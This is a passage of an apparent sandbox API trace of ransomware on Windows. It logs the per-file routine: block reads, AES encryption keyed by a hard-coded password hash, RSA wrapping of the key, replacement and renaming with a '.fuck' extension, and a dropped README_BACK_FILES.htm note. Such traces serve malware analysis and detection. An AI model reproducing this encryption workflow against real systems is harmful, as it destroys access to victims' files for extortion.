returned 1 [0276.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.376] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0276.376] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0276.376] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0276.377] CloseHandle (hObject=0x5d48) returned 1 [0276.377] CloseHandle (hObject=0x5d3c) returned 1 [0276.377] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.383] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.383] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.385] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.387] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.387] CryptDestroyKey (hKey=0x2fb308) returned 1 [0276.387] CryptReleaseContext (hProv=0x2f2a960, dwFlags=0x0) returned 1 [0276.387] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.387] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.387] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\readme_back_files.htm")) returned 0xffffffff [0276.387] AreFileApisANSI () returned 1 [0276.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.387] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.388] GetFileType (hFile=0x5d4c) returned 0x1 [0276.388] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.390] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.390] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.390] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.390] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.390] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.390] GetLastError () returned 0x0 [0276.390] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.391] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.392] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.393] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.394] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.394] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0276.397] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.397] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.398] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.398] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb608) returned 1 [0276.398] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.398] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.398] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b2f0) returned 1 [0276.398] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b2f0, dwCertEncodingType=0x1, pInfo=0x2f34c00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34c30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34c38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb8c8) returned 1 [0276.399] CryptEncrypt (in: hKey=0x2fb8c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.399] CryptEncrypt (in: hKey=0x2fb8c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b048*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b048*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.399] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2b048*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b048*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.400] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.402] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.402] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.413] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.413] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.413] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.413] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.413] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.413] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.413] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.414] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.414] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.414] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.414] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.414] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.414] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.414] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.415] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.415] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.415] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.415] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.415] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.415] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.416] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.416] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, 